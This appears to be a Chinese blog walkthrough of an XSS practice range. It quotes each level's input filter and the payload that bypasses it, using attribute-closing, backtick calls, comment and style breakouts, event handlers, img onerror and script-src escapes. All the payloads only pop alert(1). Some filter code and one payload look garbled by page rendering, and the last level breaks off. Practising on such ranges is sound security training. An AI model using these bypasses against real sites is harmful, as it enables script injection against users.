http://xss1.njhack.xyz/#/
基础,没有过滤,直接弹窗
所有文字当作文本,构造闭合绕过
</code></pre> <h3 id="0x02">0x02</h3> <p>输入的 值在value中输入,构造闭合</p> <pre><code class="language-jsx">"><script>alert(1)</script> </code></pre> <h3 id="0x03">0x03</h3> <p>过滤代码</p> <pre><code class="language-jsx">function render (input) { const stripBracketsRe = /[()]/g input = input.replace(stripBracketsRe, '') return input } </code></pre> <p>正则表达式对小括号过滤,反引号绕过</p> <pre><code class="language-jsx"><script>alert`1`</script> </code></pre> <h3 id="0x04">0x04</h3> <p>过滤代码</p> <pre><code class="language-jsx">function render (input) { const stripBracketsRe = /[()`]/g input = input.replace(stripBracketsRe, '') return input } </code></pre> <p>对小括号和反引号进行过滤,通过svg对替换内容进行Unicode编码</p> <pre><code class="language-jsx"><svg><script>alert(1)</script> </code></pre> <h3 id="0x05">0x05</h3> <p>过滤代码</p> <pre><code class="language-jsx">function render (input) { input = input.replace(/-->/g, '??') return '<!-- ' + input + ' -->' } </code></pre> <p>将输入都用注释符包起来,也不能用/和-->,通过构造注释符绕过</p> <pre><code class="language-jsx">--!><script>alert(1)</script><!-- </code></pre> <h3 id="0x06">0x06</h3> <p>过滤代码</p> <pre><code class="language-jsx">function render (input) { input = input.replace(/auto|on.*=|>/ig, '_') return `<input value=1 ${input} type="text">` } </code></pre> <p>对=和>替换,通过换行绕过</p> <pre><code class="language-jsx">onmouseover ='alert(1)' </code></pre> <h3 id="0x07">0x07</h3> <p>过滤代码</p> <pre><code class="language-jsx">function render (input) { const stripTagsRe = /<\/?[^>]+>/gi input = input.replace(stripTagsRe, '') return `<article>${input}</article>` } </code></pre> <p>输入都在article,且右标签出现会过滤全部内容,通过单标签绕过</p> <pre><code class="language-jsx"><img src=x onerror="alert(1)" </code></pre> <h3 id="0x08">0x08</h3> <p>过滤代码</p> <pre><code class="language-jsx">function render (src) { src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */') return ` <style> ${src} </style> ` } </code></pre> <p>换行绕过</p> <pre><code class="language-jsx"></style ><script>alert(1)</script><style> </code></pre> <h3 id="0x09">0x09</h3> <p>过滤代码</p> <pre><code class="language-jsx">function render (input) { let domainRe = /^https?:\/\/www\.segmentfault\.com/ if (domainRe.test(input)) { return `<script src="${input}"></script>` } return 'Invalid URL' } </code></pre> <p>要求必须带着指定网址:https://www.segmentfault.com,所以添加后构造闭合</p> <pre><code class="language-jsx">https://www.segmentfault.com" onerror="alert(1) </code></pre> <h3 id="0x0a">0x0A</h3> <p>过滤代码</p> <pre><code class="language-jsx">function render (input) { function escapeHtml(s) { return s.replace(/&/g, '&') .replace(/'/g, ''') .replace(/"/g, '"') .replace(/</g, '<') .replace(/>/g, '>') .replace(/\//g, '/') } const domainRe = /^https?:\/\/www\.segmentfault\.com/ if (domainRe.test(input)) { return `<script src="${escapeHtml(input)}"></script>` } return 'Invalid URL' } </code></pre> <p>只允许带着合法网址https://www.segmentfault.com,过滤”等字符,先在自己服务器上生成一个js结尾的文件,叫abc.js</p> <pre><code class="language-jsx">alert(1); //记得加分号 </code></pre> <p>这里是js代码,不用通过</p> </div> <!--conend--> <div class="p-2"></div> <div class="arcinfo my-3 fs-7 text-center"> <a href='/t/etagid27293-0.html' class='tagbtn' target='_blank'>靶场攻略</a> </div> <div class="p-2"></div> </div> <div class="p-2"></div> <!--xg--> <div class="lbox p-4 shadow-sm rounded-3"> <div class="boxtitle"><h2 class="fs-4">相关</h2></div> <hr> <!----> <!----> </div> <!--xgend--> </div> <div class="col-lg-3 col-12 p-0 ps-lg-2"> <!--box--> <!--boxend--> <!--<div class="p-2"></div>--> <!--box--> <div class="lbox p-4 shadow-sm rounded-3"> <div class="boxtitle pb-2"><h2 class="fs-4"><a href="#">标签</a></h2></div> <div class="clearfix"></div> <ul class="m-0 p-0 fs-7 r-tag"> </ul> <div class="clearfix"></div> </div> <!--box end--> </div> </div> </div> </main> <div class="p-2"></div> <footer> <div class="container-fluid p-0 bg-black"> <div class="container p-0 fs-8"> <p class="text-center m-0 py-2 text-white-50">一品网 <a class="text-white-50" href="https://beian.miit.gov.cn/" target="_blank">冀ICP备14022925号-6</a></p> </div> </div> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?6e3dd49b5f14d985cc4c6bdb9248f52b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> </footer> <script src="/skin/bootstrap.bundle.js"></script> </body> </html>